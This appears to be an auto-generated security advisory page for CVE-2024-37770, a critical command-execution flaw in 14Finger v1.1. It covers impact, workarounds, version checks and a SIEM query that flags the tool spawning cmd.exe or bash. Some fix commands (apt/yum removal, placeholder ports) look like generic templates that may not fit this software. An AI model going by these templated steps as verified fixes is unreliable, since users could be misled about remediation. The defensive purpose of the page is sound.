CVE-2024-37770 – CVE-2024-37770 is a critical remote command exe... (How to Fix)

Q: What is the severity of CVE-2024-37770?

CVE-2024-37770 has a CVSS score of 9.1 (CRITICAL). CVE-2024-37770 is a critical remote command execution vulnerability in 14Finger v1.1 that allows attackers to execute arbitrary system commands via crafted payloads sent to the fingerprint function. This affects all users running the vulnerable version of 14Finger, potentially leading to complete system compromise.

📋 TL;DR

CVE-2024-37770 is a critical remote command execution vulnerability in 14Finger v1.1 that allows attackers to execute arbitrary system commands via crafted payloads sent to the fingerprint function. This affects all users running the vulnerable version of 14Finger, potentially leading to complete system compromise.

💻 Affected Systems

Products:

14Finger

Versions: v1.1

Operating Systems: All platforms running 14Finger

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default configuration of 14Finger v1.1.

📦 What is this software?

14finger by B1ackc4t

View all CVEs affecting 14finger →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system takeover with administrative privileges, data exfiltration, ransomware deployment, and lateral movement across the network.

🟠

Likely Case

Unauthorized command execution leading to data theft, malware installation, or system disruption.

🟢

If Mitigated

Limited impact with proper network segmentation, least privilege, and monitoring in place.

🌐 Internet-Facing: HIGH - Directly exploitable from the internet without authentication.

🏢 Internal Only: HIGH - Equally dangerous internally if attackers gain network access.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Multiple public proof-of-concept exploits are available, making this easily weaponizable.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

No official patch available. Consider workarounds or discontinuing use of 14Finger v1.1.

🔧 Temporary Workarounds

Disable or Remove 14Finger

linux

Completely remove or disable the vulnerable 14Finger application

sudo systemctl stop 14finger
sudo apt remove 14finger
sudo yum remove 14finger

Network Isolation

linux

Restrict network access to 14Finger using firewall rules

sudo iptables -A INPUT -p tcp --dport [14Finger_port] -j DROP
sudo ufw deny [14Finger_port]

🧯 If You Can't Patch

Implement strict network segmentation to isolate affected systems
Deploy application-level firewalls with command injection detection rules

🔍 How to Verify

Check if Vulnerable:

Check if 14Finger v1.1 is installed and running on the system

Check Version:

14finger --version or check package manager: dpkg -l | grep 14finger or rpm -qa | grep 14finger

Verify Fix Applied:

Verify 14Finger v1.1 is no longer installed or running

📡 Detection & Monitoring

Log Indicators:

Unusual command execution patterns in system logs
Suspicious process creation from 14Finger
Unexpected network connections from 14Finger process

Network Indicators:

Unusual traffic to/from 14Finger port
Command injection patterns in HTTP requests

SIEM Query:

source="*14finger*" AND (process="cmd.exe" OR process="/bin/bash" OR process="/bin/sh")

📊 Metadata

CVE ID: CVE-2024-37770

CVSS v3 Score: 9.1 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE: CWE-94

Published: July 10, 2024

Last Updated: July 1, 2025

🔗 References

https://github.com/b1ackc4t/14Finger/issues/13 Exploit,Issue Tracking,Vendor Advisory
https://github.com/k3ppf0r/CVE-2024-37770 Exploit,Third Party Advisory
https://github.com/b1ackc4t/14Finger/issues/13 Exploit,Issue Tracking,Vendor Advisory
https://github.com/k3ppf0r/CVE-2024-37770 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-37770, you might also want to check these: